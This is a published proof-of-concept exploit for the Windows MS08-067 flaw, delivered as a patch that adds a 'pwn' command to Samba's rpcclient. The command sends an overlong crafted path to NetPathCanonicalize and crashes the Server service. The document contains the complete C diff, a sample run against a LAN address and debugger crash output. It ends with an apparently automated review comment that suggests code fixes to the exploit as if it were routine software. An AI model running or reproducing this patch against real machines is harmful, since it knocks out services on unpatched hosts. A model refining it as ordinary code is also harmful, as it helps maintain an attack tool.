This patch is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA (c) Tim Brown, 2008 / PoC exploit for MS08-067. It is based on the *broken* PoC made available at: http://www.securityfocus.com/data/vulnerabilities/exploits/31874.zip. It uses Samba's rpcclient as the transport. This patch adds an additional command to rpcclient, 'pwn', which sends a crafted path to NetPathCanonicalize over the \srvsvc pipe and crashes the Server service inside netapi32.dll. It is a denial-of-service demonstration only: the payload is a long run of 'c' characters rather than shellcode, so it does not achieve code execution. Since it crashes the service, it should obviously only be used on systems that a) you own and b) don't require availability. Please don't abuse. For example: user@localhost:~$ bin/rpcclient -UAdministrator%test 192.168.179.129 -c pwn Receiving SMB: Server stopped responding rpc_api_pipe: Remote machine 192.168.179.129 pipe \srvsvc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was DOS code 0xe85eecc0 cli_rpc_pipe_close: cli_close failed on pipe \srvsvc, fnum 0x4001 to machine 192.168.179.129. 
Error was Call timed out: server did not respond after 10000 milliseconds Debugger output: Registers: EAX 01922FFE ECX 0195F4BE UNICODE "cccccccccccccccccccccccccccccccccccccccccccccccccccccc cccccccccccccccccccccccccccccccccccccccccccccc" EDX 0195F8BC EBX 0195005C ESP 0195F484 EBP 0195F494 ESI 0195F4B4 UNICODE "\..\cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc" EDI 0195F4B4 UNICODE "\..\cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc" EIP 71C55FAD NETAPI32.71C55FAD C 1 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 0 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FF96000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_MORE_DATA (000000EA) EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G) ST0 empty 0.0 ST1 empty 0.0 ST2 empty 0.0 ST3 empty 0.0 ST4 empty 0.0 ST5 empty 0.0 ST6 empty 0.0 ST7 empty 0.0 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 Patch is below:
diff -ur samba-3.2.4/source/rpcclient/cmd_srvsvc.c samba-3.2.4-poc/source/rpcclient/cmd_srvsvc.c
--- samba-3.2.4/source/rpcclient/cmd_srvsvc.c 2008-09-18 07:49:02.000000000 +0100
+++ samba-3.2.4-poc/source/rpcclient/cmd_srvsvc.c 2008-10-24 15:14:15.000000000 +0100
@@ -673,6 +668,27 @@
 return result;
 }
 
+static WERROR cmd_srvsvc_pwn(struct rpc_pipe_client *cli,
+ TALLOC_CTX *mem_ctx,
+ int argc, const char **argv)
+{
+ WERROR result;
+ NTSTATUS status;
+
+ unsigned char x[10000];
+ long q = 1;
+
+ status = rpccli_srvsvc_NetPathCanonicalize(cli, mem_ctx,
+ cli->cli->desthost, ".\\\\c\\..\\..\\cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc", x, 10000, "", &q, 1, &result);
+
+ if (!NT_STATUS_IS_OK(status) || !W_ERROR_IS_OK(result)) {
+ goto done;
+ }
+ done:
+ return result;
+}
+
+
 static WERROR cmd_srvsvc_net_sess_enum(struct rpc_pipe_client *cli,
 TALLOC_CTX *mem_ctx,
 int argc, const char **argv)
@@ -891,6 +907,7 @@
 { "netsessenum", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_net_sess_enum, PI_SRVSVC, NULL, "Enumerate Sessions", "" },
 { "netdiskenum", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_net_disk_enum, PI_SRVSVC, NULL, "Enumerate Disks", "" },
 { "netconnenum", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_net_conn_enum, PI_SRVSVC, NULL, "Enumerate Connections", "" },
+ { "pwn", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_pwn, PI_SRVSVC, NULL, "PWN", "" },
 { NULL }
 };
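Review bot: In cmd_srvsvc_pwn, `result` is declared without an initializer and is returned even when the RPC call fails at the transport level, which is exactly the path the page's own example takes (the call times out and rpcclient then prints `DOS code 0xe85eecc0`, which looks like stack garbage rather than a real WERROR); if the generated stub returns early on a non-OK NTSTATUS without writing `*werror`, that value is uninitialized, and the `if (...) goto done; done:` sequence adds nothing because both branches fall through to the same `return`. Initialize and map the status instead: `WERROR result = WERR_OK;` at the top, then replace the if/goto with `if (!NT_STATUS_IS_OK(status)) { return ntstatus_to_werror(status); }` followed by `return result;`. `argc`/`argv` are accepted but never read, and the 10000 buffer length is repeated as a literal in the call; passing `sizeof(x)` keeps the two from drifting apart. The second hunk only registers the command and needs nothing beyond a help string more informative than "PWN", e.g. `"Crash the Server service (MS08-067 NetPathCanonicalize PoC)"`.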